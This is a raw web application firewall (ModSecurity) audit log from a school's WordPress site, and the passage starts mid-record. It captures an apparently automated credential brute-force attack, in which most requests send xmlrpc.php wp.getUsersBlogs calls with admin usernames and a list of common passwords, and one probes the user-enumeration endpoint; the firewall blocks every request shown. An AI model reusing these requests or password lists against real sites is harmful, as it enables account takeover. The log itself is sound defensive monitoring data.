Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c908c527-C-- wp.getUsersBlogs administrator magic --c908c527-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c908c527-E-- --c908c527-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119122218840 4697 (- - -) Stopwatch2: 1749119122218840 4697; combined=3509, p1=344, p2=2971, p3=0, p4=0, p5=111, sr=78, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c908c527-Z-- --5ca4814e-A-- [05/Jun/2025:17:25:26 +0700] aEFwllwdJdhOudw5hdz6lgAAAIs 103.236.140.4 48912 103.236.140.4 8181 --5ca4814e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.147.185.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.147.185.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ca4814e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ca4814e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749119126396948 1943 (- - -) Stopwatch2: 1749119126396948 1943; combined=1006, p1=350, p2=629, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ca4814e-Z-- --fe351534-A-- [05/Jun/2025:17:26:24 +0700] aEFw0Oth7G2xELALzPZY2QAAAMw 103.236.140.4 49060 103.236.140.4 8181 --fe351534-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fe351534-C-- wp.getUsersBlogs administrator astonvilla --fe351534-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe351534-E-- --fe351534-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (60+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119184045124 5178 (- - -) Stopwatch2: 1749119184045124 5178; combined=3706, p1=472, p2=3065, p3=0, p4=0, p5=100, sr=91, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe351534-Z-- --80e5c053-A-- [05/Jun/2025:17:27:26 +0700] aEFxDuth7G2xELALzPZZGAAAANI 103.236.140.4 49198 103.236.140.4 8181 --80e5c053-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --80e5c053-C-- wp.getUsersBlogs kajur Admin123 --80e5c053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80e5c053-E-- --80e5c053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (63+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119246191906 5410 (- - -) Stopwatch2: 1749119246191906 5410; combined=3685, p1=495, p2=3033, p3=0, p4=0, p5=94, sr=107, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e5c053-Z-- --741cbd3c-A-- [05/Jun/2025:17:28:29 +0700] aEFxTeth7G2xELALzPZZcgAAANA 103.236.140.4 49380 103.236.140.4 8181 --741cbd3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --741cbd3c-C-- wp.getUsersBlogs kajur kajur2002 --741cbd3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --741cbd3c-E-- --741cbd3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (87+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119309297871 5294 (- - -) Stopwatch2: 1749119309297871 5294; combined=3746, p1=436, p2=3107, p3=0, p4=0, p5=116, sr=84, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --741cbd3c-Z-- --36d8f736-A-- [05/Jun/2025:17:29:30 +0700] aEFxiuth7G2xELALzPZZogAAANI 103.236.140.4 49492 103.236.140.4 8181 --36d8f736-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --36d8f736-C-- wp.getUsersBlogs kajur Marketing2017 --36d8f736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36d8f736-E-- --36d8f736-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119370935747 5228 (- - -) Stopwatch2: 1749119370935747 5228; combined=3713, p1=474, p2=3070, p3=0, p4=0, p5=100, sr=96, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36d8f736-Z-- --9a84b722-A-- [05/Jun/2025:17:30:30 +0700] aEFxxirHpfaS2Cuwh8UF6AAAAE8 103.236.140.4 49632 103.236.140.4 8181 --9a84b722-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --9a84b722-C-- wp.getUsersBlogs kajur marketing2023 --9a84b722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a84b722-E-- --9a84b722-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119430943635 4305 (- - -) Stopwatch2: 1749119430943635 4305; combined=3317, p1=348, p2=2803, p3=0, p4=0, p5=96, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a84b722-Z-- --ba9d9629-A-- [05/Jun/2025:17:31:35 +0700] aEFyB-th7G2xELALzPZZ3gAAAM0 103.236.140.4 49766 103.236.140.4 8181 --ba9d9629-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ba9d9629-C-- wp.getUsersBlogs kajur admin123456 --ba9d9629-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ba9d9629-E-- --ba9d9629-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119495413850 4480 (- - -) Stopwatch2: 1749119495413850 4480; combined=3402, p1=353, p2=2874, p3=0, p4=0, p5=102, sr=79, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ba9d9629-Z-- --366fdb7a-A-- [05/Jun/2025:17:32:35 +0700] aEFyQ1wdJdhOudw5hdz6-wAAAJc 103.236.140.4 49960 103.236.140.4 8181 --366fdb7a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --366fdb7a-C-- wp.getUsersBlogs kajur admin@888 --366fdb7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --366fdb7a-E-- --366fdb7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (82+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119555099939 4187 (- - -) Stopwatch2: 1749119555099939 4187; combined=3250, p1=362, p2=2725, p3=0, p4=0, p5=95, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --366fdb7a-Z-- --1d672338-A-- [05/Jun/2025:17:33:35 +0700] aEFyfyrHpfaS2Cuwh8UGLAAAAE4 103.236.140.4 50084 103.236.140.4 8181 --1d672338-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --1d672338-C-- wp.getUsersBlogs kajur superuser --1d672338-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d672338-E-- --1d672338-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (56+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119615115650 4631 (- - -) Stopwatch2: 1749119615115650 4631; combined=3433, p1=367, p2=2872, p3=0, p4=0, p5=111, sr=83, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d672338-Z-- --81c96b4d-A-- [05/Jun/2025:17:34:35 +0700] aEFyu1wdJdhOudw5hdz7LgAAAI8 103.236.140.4 50224 103.236.140.4 8181 --81c96b4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --81c96b4d-C-- wp.getUsersBlogs kajur admin123456789 --81c96b4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81c96b4d-E-- --81c96b4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (51+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119675140246 5368 (- - -) Stopwatch2: 1749119675140246 5368; combined=3795, p1=418, p2=3166, p3=0, p4=0, p5=120, sr=87, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81c96b4d-Z-- --ec78b47f-A-- [05/Jun/2025:17:35:38 +0700] aEFy-uth7G2xELALzPZaEQAAANI 103.236.140.4 50374 103.236.140.4 8181 --ec78b47f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ec78b47f-C-- wp.getUsersBlogs kajur love --ec78b47f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec78b47f-E-- --ec78b47f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (69+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119738447212 5017 (- - -) Stopwatch2: 1749119738447212 5017; combined=3490, p1=415, p2=2904, p3=0, p4=0, p5=101, sr=79, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec78b47f-Z-- --4d7bb850-A-- [05/Jun/2025:17:36:07 +0700] aEFzF-th7G2xELALzPZaIgAAAMk 103.236.140.4 50468 103.236.140.4 8181 --4d7bb850-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4d7bb850-C-- wp.getUsersBlogs kajur 1234%^&* --4d7bb850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d7bb850-E-- --4d7bb850-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119767294707 4218 (- - -) Stopwatch2: 1749119767294707 4218; combined=3192, p1=352, p2=2676, p3=0, p4=0, p5=97, sr=78, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d7bb850-Z-- --f7f53a69-A-- [05/Jun/2025:17:36:48 +0700] aEFzQFwdJdhOudw5hdz7RwAAAJA 103.236.140.4 50524 103.236.140.4 8181 --f7f53a69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f7f53a69-C-- wp.getUsersBlogs kajur yellow --f7f53a69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7f53a69-E-- --f7f53a69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119808880302 2731 (- - -) Stopwatch2: 1749119808880302 2731; combined=2011, p1=222, p2=1685, p3=0, p4=0, p5=61, sr=49, sw=43, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7f53a69-Z-- --ac8c3a0a-A-- [05/Jun/2025:17:37:50 +0700] aEFzfirHpfaS2Cuwh8UGtAAAAE0 103.236.140.4 50712 103.236.140.4 8181 --ac8c3a0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ac8c3a0a-C-- wp.getUsersBlogs kajur maria --ac8c3a0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac8c3a0a-E-- --ac8c3a0a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (83+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119870057948 4171 (- - -) Stopwatch2: 1749119870057948 4171; combined=3215, p1=381, p2=2668, p3=0, p4=0, p5=97, sr=98, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac8c3a0a-Z-- --a0c21c6c-A-- [05/Jun/2025:17:38:50 +0700] aEFzuirHpfaS2Cuwh8UG1gAAAFg 103.236.140.4 50878 103.236.140.4 8181 --a0c21c6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a0c21c6c-C-- wp.getUsersBlogs kajur iloveu --a0c21c6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0c21c6c-E-- --a0c21c6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749119930614572 4662 (- - -) Stopwatch2: 1749119930614572 4662; combined=3353, p1=393, p2=2799, p3=0, p4=0, p5=94, sr=82, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 